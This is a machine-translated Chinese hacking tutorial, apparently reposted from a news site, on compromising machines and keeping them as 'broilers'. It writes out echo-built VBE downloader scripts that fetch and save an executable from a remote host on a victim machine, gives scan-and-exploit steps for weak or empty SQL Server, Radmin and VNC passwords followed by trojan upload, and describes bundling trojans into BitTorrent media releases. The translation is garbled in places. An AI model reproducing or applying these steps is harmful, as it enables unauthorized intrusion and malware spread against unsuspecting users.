echowithwscript:if.arguments.count^2then.quit:endif
dl.vbe
echosetaso=.createobject(\'adodb.stream\'):set
web=createobject(\'microsoft.xmlhttp\')dl.vbe
echoweb.open\'get\',arguments(0),0:web.send:if
web.status^200thenquitdl.vbe
回声
aso.type=1:aso.open:aso.writeweb.responsebody:aso.savetofile
.arguments(1),2:endwithdl.vbe
cscriptdl.vbehttp://*。 *。 *。 *:88/sample.exesample.exe
使用iget.vbe 方法
方法与4相同,但是
在肉鸡cmd中运行。
echoiLocal=LCase(WScript.Arguments(1))iget.vbe
echoiRemote=LCase(WScript.Arguments(0))iget.vbe
echoSetxPost=CreateObject(\'Microsoft.XMLHTTP\')
iget.vbe
echoxPost.Open\'GET\',iRemote,0iget.vbe
echoxPost.Send()iget.vbe
echoSetsGet=CreateObject(\'ADODB.Stream\')iget.vbe
echosGet.Mode=3iget.vbe
echosGet.Type=1iget.vbe
echosGet.Open()iget.vbe
echosGet.Write(xPost.responseBody)iget.vbe
echosGet.SaveToFileiLocal,2iget.vbe
cscriptiget.vbehttp://*。 *。 *。 */sample.exe 样本.exe
对HTTP 网站使用VBE 方法
echoSetxPost=CreateObject(\'Microsoft.XMLHTTP\')
dsa.vbe
echoxPost.Open\'GET\',\'http://*.*.*.*/sample.exe\',0
dsa.vbe
echoxPost.Send()dsa.vbe
echoSetsGet=CreateObject(\'ADODB.Stream\')dsa.vbe
echosGet.Mode=3dsa.vbe
echosGet.Type=1dsa.vbe
echosGet.Open()dsa.vbe
echosGet.Write(xPost.responseBody)dsa.vbe
echosGet.SaveToFile\'sample.exe\',2dsa.vbecscript
dsa.vbe
德尔德萨.vbe
3389 法律
您可以打开3389,登录并本地下载。这个方法对服务很有用
这对于上传要求非常严格的机器尤其有效。 (包括硬件防火墙)
如果先打开多个NC.bat,再打开scan+overflow.bat,可以:
睡觉。自动扫描、扫描后自动溢出、溢出后自动下载
享受马术!现在,让我详细解释一下(笑)。还有4221端口
你可以像这样溢出。只需使用这些端口上的溢出工具即可查看详细的动画。
访问黑客网站并搜索1433。
忘了说了,上面的工具和批处理必须放在同一个文件中。
夹上它。
首先,休息一下。我因为打字太多而感到疲倦。
继续
5.扫描1433抓肉鸡2
使用工具:端口扫描器X-scanSQL综合利用工具
如上所述,目前1433溢出的成功率不高;
您还可以使用另一种方法。打开端口1433 的计算机通常安装了SQL。
所以你可以猜出弱SQL密码来抓1433只鸡。
首先,使用端口扫描器扫描您的IP段上的1433端口,并将结果保存为以下格式:
创建一个文本文件并使用X-scan导入并扫描这些打开1433的IP
在[参数]-[全局设置]-[扫描模块]栏中检查SQL-SERVER。
,不检查其他的。然后进入插件设置-端口相关设置-要检测的端口。
仅在一列中输入端口1433。然后就可以开始扫描了。扫描完成后,
有一份报告列出了弱密码的机器,并打开了SQL综合工具。
工具,输入扫描到的弱密码进行连接,打开SQL综合工具。
使用目录上传木马,并使用DOS命令运行木马。
知道了。
6、利用WINNTAuto Attack扫描SA弱口令,抓肉鸡
其实原理和上面是一样的,只是效率没有上面那么高。我只是想变得更有效率。
大家都知道,呵呵。
工具:WINNTAuto AttackSQL综合利用工具
打开WINNTAuto Attack,找到您的IP,添加它,然后仅检查设置。
仅会发现PING 检查成功的计算机,并且SQL 将列出密码为空的SA。
扫描完成后,使用SQL综合工具连接并上传你的马。
去做就对了。
7、4899扫空密码抓鸡
工具: 端口扫描器4899 检测器Radmin
首先,使用端口扫描器扫描您的IP的4899端口,然后使用4899进行发现。
将4899端口的IP导入服务器,扫描空命令,最后使用Radmin连接服务器。
如果您的机器密码为空,您只需打开文件管理器并运行上传的木马即可。
更多动画请访问黑客网站搜索4899。
8.扫描5900端口捕获VNC肉鸡
工具:VNC扫描仪VNC连接器
首先,使用VNC 扫描仪扫描IP 段。扫描格式为vscan.exe(扫描
设备文件名)-i219.0.0.0-219.255.255.255(IP段扫描)-p5900-
vnc-vv扫描完成后,它将在扫描仪所在的同一文件夹中生成文件。
打开此文件,您将看到IP 列表。 IP之后包括:
只有补丁、禁止、易受攻击、易受攻击这几个词可以联系起来。在那之后
只需使用VNC 连接器进行连接即可。下面就不用再详细阐述了。详细的动画可以在这里找到:
黑客网站搜索VNC
现在我们来说说挂马捉肉鸡。方式有很多,比如BT挂马、免费
还有一些我不知道的东西,比如太空马和雷霆马(笑)。下面介绍一下
请告诉我一些我知道该怎么做的方法。
1.BT挂马
顾名思义,它会将木马发布在BT网站上供人们下载。当然,如果只是发布一个简单的木马文件,效果肯定会很差。目前,常见的BT网站不允许发布EXE文件。因此,需要一些隐藏的技巧。首先,它使用捆绑器将木马与电影、音乐和游戏捆绑在一起,然后将其压缩成RAR文件并发布。一旦你开始下载谁会知道RAR中存在特洛伊木马呢?当我下载并打开它时,它是EXE格式的,因此一些初学者可能因为不想浪费时间而不得不打开它。特别是如果你想下载XXX电影,你当然可以创建一个网络木马并将网络木马的地址插入到你发布的文件中(不是所有文件都可以这样。你所知道的是你可以注入RM和EXE文件),因此,如果有人下载并打开您的网络木马,他们也会打开它。如果系统没有为你的网络木马提供可利用的漏洞,它们就会落入你的陷阱。有朋友建议,如果我将木马与其他文件捆绑在一起,并保留该文件内的格式(例如RM在捆绑木马后保留RM格式),其他人可能会认为此人不会起疑。哈哈,如果有这么好的东西,我上面为什么不说,把木马和BT种子文件捆绑放出,这样就不会迷惑了~~所以来吧,捆绑后生成的文件带有其他文件的木马只能是EXE格式,除非捆绑文件的格式存在溢出漏洞。因此,生成的文件格式是捆绑文件。但目前此类漏洞
很少,大部分都填了,如果还有其他的,也可能没有发表。本文描述了最近的RAR 溢出漏洞。只要winrar 版本低于3.6,3.6 之前的所有winrar 版本在运行与Wrangler 捆绑的RAR 文件时都容易受到攻击。此类木马的症状有:当您运行RAR文件时,会出现一个对话框,指示该文件已损坏或不正确,RAR文件大小会减小,减小的大小就是木马的大小。然后,当您再次打开RAR 文件时,错误对话框不会出现,一切正常。希望大家尽快更新自己的WINRAR版本,小心不要落入陷阱。
标题:网络安全攻防实验室,东营市网络安全实验室证书查询
链接:https://www.7kxz.com/news/gl/23173.html
版权:文章转载自网络,如有侵权,请联系删除!